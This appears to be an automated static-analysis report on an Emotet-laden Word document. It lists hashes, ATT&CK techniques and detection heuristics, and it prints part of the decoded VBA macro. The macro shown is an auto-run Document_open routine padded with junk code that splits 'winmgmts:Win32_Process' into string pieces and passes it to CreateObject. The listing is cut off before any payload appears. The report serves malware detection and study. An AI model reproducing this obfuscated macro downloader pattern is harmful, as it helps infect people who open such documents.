Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7498095cccc978f9…

MALICIOUS

Office (OLE)

Size: 71.6 KB
Created: 2019-12-09 20:45:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 803d828755d0fe65bb71ec1847cf74b4
SHA-1: 6c3715b5105363732ad3b5ba53dd534b61af3d6b
SHA-256: 7498095cccc978f9e0b4109dd5dd410a15cd876eee1865cf97fdbb165fafcf53
Risk score: 322

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro, which is a common execution vector for Emotet. The macro uses CreateObject to launch a WMI process, specifically targeting 'winmgmts' to create a new process, indicating a downloader functionality. ClamAV also identifies the file as Emotet.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7441513-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7441513-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5955 bytes
SHA-256: 114d0ac7b845f2d1ceab27a1e6701a951700711443b6725daa8730efe72773f1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Famjyftcpm"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Solnxtsanwfpo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Osydlehlx, Chkzhwkot
If Tczzarwmzw > Fuxkjnwdnsa Then
         Lvmjmcuadyvdm = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Oknkrsffjmb < Axabizpwkdntq Then
         Vbhwjgpd = 22
End If
If Agfpcwlbyaf < Vmptehaqaedj Then
         Erqkuvlit = 355
End If
   Dim Cynilbrz, Qbtdifkcjlte
If Tpktgixjc > Plgjfiruadr Then
         Fyflclkyo = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Wrysjyhzxqs < Secbkjcb Then
         Ohdlgqmp = 22
End If
If Rnnkykcv < Rmeatyiin Then
         Mlpklfmbj = 355
End If
   Dim Znyzbutqecw, Orawglpxn
If Ncbjdtnps > Mvrgiycmr Then
         Trdesisltm = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Mzsjmlohiwgf < Adqubcnci Then
         Yafwhqvse = 22
End If
If Qppaclbxk < Nipuzlqdjqidn Then
         Lbflmbztnb = 355
End If
Akrbicbc
End Sub

Attribute VB_Name = "Lgnkjbfmsbjpf"
Attribute VB_Base = "0{AD0BD801-123D-4A4E-B96A-F2D0624E8C91}{01E71656-75DF-40BD-876F-FA9178C9399C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Updlyphvj"
Function Spwjtgklu()
   Dim Rgvkdycxllx, Ajzfljxnaezw
If Yboshxps > Sqaudmxhn Then
         Baizotzrcvnny = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Wsqhchjsnujdk < Sikbwbgss Then
         Bxkeccqhpfr = 22
End If
If Sshvefqp < Dfdwhvqzxdmgm Then
         Sgmcxbbbgj = 355
End If
Tgxsqzssdfs = Famjyftcpm.Solnxtsanwfpo
   Dim Viyvfgqegijxe, Dxnphwgfbyjl
If Yuholrii > Xccekklkflr Then
         Dqdpcxwvvvb = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Cithivnwsfu < Qnyfjlzfexib Then
         Mubgawxicr = 22
End If
If Vlsllini < Xpmpihxlkg Then
         Bbqytfwikh = 355
End If
Kkrlhnpnava = Tgxsqzssdfs + Lgnkjbfmsbjpf.Hixjrdklnk + Lgnkjbfmsbjpf.Ngwkgneavqx + Lgnkjbfmsbjpf.Hmncnzvmirks
   Dim Mmpifpeb, Rxtrxgyzlub
If Zoxymraeqncql > Fqheysnrscyz Then
         Ozbtpqtirrjf = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Jqalxguu < Vdmwfvosfjcob Then
         Syxzpvshmibc = 22
End If
If Nbumdxme < Vdqabyvo Then
         Eiwvwccvzod = 355
End If
Fwagayvtk = Kkrlhnpnava + Lgnkjbfmsbjpf.Cqzejkcrikxai + Lgnkjbfmsbjpf.Ahbsykuibvs
   Dim Fdlbtgjit, Qiiuxpfnhpyv
If Njuvtjpa > Ttrqnksst Then
         Pjbaycjvrhhlz = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Pnaaeqhdadypa < Fcieyzsuuhgfj Then
         Hrkqvfssmg = 22
End If
If Bwamjyubf < Hxwsftxkyfow Then
         Jarnjwyqt = 355
End If
Spwjtgklu = Chprvmlpmj + Fwagayvtk + Chprvmlpmj
   Dim Wileuzcy, Qbhjyjukgb
If Tgonktyzfad > Tojxapgpxphoq Then
         Djekzhpe = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Oizufqxnm < Lngmuzvrgzue Then
         Vvtuqejtqmhgv = 22
End If
If Jbdkhrwyyfhun < Tdeyjuesw Then
         Swtfoecswx = 355
End If
End Function
Function Akrbicbc()
   Dim Revygwut, Qlfgejwnmmmhz
If Htippjolokui > Afvvnlnaqbkx Then
         Aqkeqdzc = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Jobaqvjab < Hrlmthgdhe Then
         Kkyapsrvytq = 22
End If
If Knkurkvbsszys < Syezrzqpsvuhk Then
         Oaamjtwjpuw = 355
End If
Mgjidalddet = j + "win" + "mgmt" + "s:Win32_Process"
   Dim Dpttxgrdxnic, Urgcxobbyf
If Whhraqzvkjjw > Ohaxrmlqcl Then
         Yvqcrowdkkw = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Rcpzlikqkz < Ankifevy Then
         Eehrvaicelul = 22
End If
If Wrrdiynvxb < Muefbhaz Then
         Rtnjhiuifo = 355
End If
Set Motbdzzstl = CreateObject(Mgjidalddet)
   Dim Wgccharwjkavk, Doxvhiutzme
If Eabgzifzeetwf > Xnhmjirrti Then
         Cndqcnrsjju = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Oozjdyba < Merdrmjhxhsdm Then
         Qjoqbntlkvu = 22
End If
If Qjppsrqll < Fzcwojlb Then
         Npnkiitthhw
... (truncated)